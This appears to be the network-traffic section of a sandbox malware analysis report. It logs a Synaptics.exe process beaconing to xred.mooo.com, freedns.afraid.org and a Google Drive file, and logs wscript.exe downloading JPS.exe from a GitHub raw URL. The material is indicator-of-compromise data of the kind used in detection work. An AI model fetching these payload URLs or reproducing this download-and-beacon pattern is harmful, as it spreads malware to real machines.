Dec 30, 2024 11:48:05.620081902 CET | 1.1.1.1 | 192.168.2.7 | 0x6bde | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:05.653178930 CET | 1.1.1.1 | 192.168.2.7 | 0x1e1 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:05.981460094 CET | 1.1.1.1 | 192.168.2.7 | 0xffac | No error (0) | drive.usercontent.google.com | | 142.250.186.161 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:09.912245035 CET | 1.1.1.1 | 192.168.2.7 | 0x9a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:15.613353968 CET | 1.1.1.1 | 192.168.2.7 | 0xddb6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:20.143455029 CET | 1.1.1.1 | 192.168.2.7 | 0xad35 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:26.104624987 CET | 1.1.1.1 | 192.168.2.7 | 0x585e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:33.004710913 CET | 1.1.1.1 | 192.168.2.7 | 0xd2ee | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:37.928535938 CET | 1.1.1.1 | 192.168.2.7 | 0x4ad7 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:43.582453012 CET | 1.1.1.1 | 192.168.2.7 | 0xe42f | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:48.098675966 CET | 1.1.1.1 | 192.168.2.7 | 0x22b2 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:48:53.770006895 CET | 1.1.1.1 | 192.168.2.7 | 0x8fb3 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                        • docs.google.com
                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                        • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49828 | 69.42.215.252 | 80 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:48:05.662220001 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                        User-Agent: MyApp
                                                                                                                                                        Host: freedns.afraid.org
                                                                                                                                                        Cache-Control: no-cache
Dec 30, 2024 11:48:06.244319916 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 185.199.108.133 | 443 | 400 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:47:40 UTC | 372 | OUT | GET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Language: en-ch
                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                        Connection: Keep-Alive
2024-12-30 10:47:40 UTC | 904 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 1989120
                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        ETag: "bdddedd12f441fd49d4b4a9b2460315902308429e08ce76c54dcf4a1b24922a8"
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        X-GitHub-Request-Id: 2633:10771E:2D85756:33596B9:67727A4A
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:47:40 GMT
                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                        X-Served-By: cache-nyc-kteb1890089-NYC
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                        X-Timer: S1735555661.706106,VS0,VE75
                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                        X-Fastly-Request-ID: c54722dd14ebf1e7c5fd454e83a069a51b09cfa6
                                                                                                                                                        Expires: Mon, 30 Dec 2024 10:52:40 GMT
                                                                                                                                                        Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49820 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:05 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:05 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cO6vwGoc7zM-WGvcTf_NEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        2 | 192.168.2.7 | 49821 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:05 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:05 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eMo3WJ5biTZgt3mOKjCryA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        3 | 192.168.2.7 | 49830 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:06 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ZT3372iuHMGWyC2Vf-kOpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        4 | 192.168.2.7 | 49831 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:06 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:48:07 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7ywu_3TBP-MHjFpVsB2yRbR7tRjaSg_zGJzQaCblDdt9-PDcXGw7Qp7xLI4651CBjx
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R0EfUWx9XpW5Ur8e_oFlLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT; expires=Tue, 01-Jul-2025 10:48:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:07 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K0-Z_hFl9X8RVF85ItT_6w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                        2024-12-30 10:48:07 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        5 | 192.168.2.7 | 49832 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:06 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:48:07 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7fA_f1yz2G6qMJnHHHlZpEROzFDu7u_4Gs0Mi34Cy03ddzgbGkvRLUkBSIZY2_2FH1
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dnqnA7X8CQ1kQ9FIB-K8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg; expires=Tue, 01-Jul-2025 10:48:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:07 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TBaRFx4f4ubTBBl9As6Fxg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                        2024-12-30 10:48:07 UTC | 58 | IN | Data Ascii: nd on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        6 | 192.168.2.7 | 49842 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:08 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-x_99aJc4k16laYN9BKgV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49843 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:07 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
2024-12-30 10:48:08 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4Is_SY6GhSH93Gfd4n8mrBZBjpgdlOHhWVwN3vxfYuPLI2YNcpq3gPe64ucg13EipQ
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FKQQiM-Dc1ZGrfJu0-jOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Set-Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy; expires=Tue, 01-Jul-2025 10:48:08 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:08 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vWE8S4YIhr6IqQmro_NOAQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:48:08 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49857 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:08 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:09 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC75sGvxFkdgXrovrw0O3ji1vGS1xugsTLKnSor4rG-MwSugKr5VjylxUzD5Ja7CAbT1
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:09 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ecn_lmiftaqPWmfLmp5kZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:09 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:09 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="SwFepohN5fHJU8wt0nkAtw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:09 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


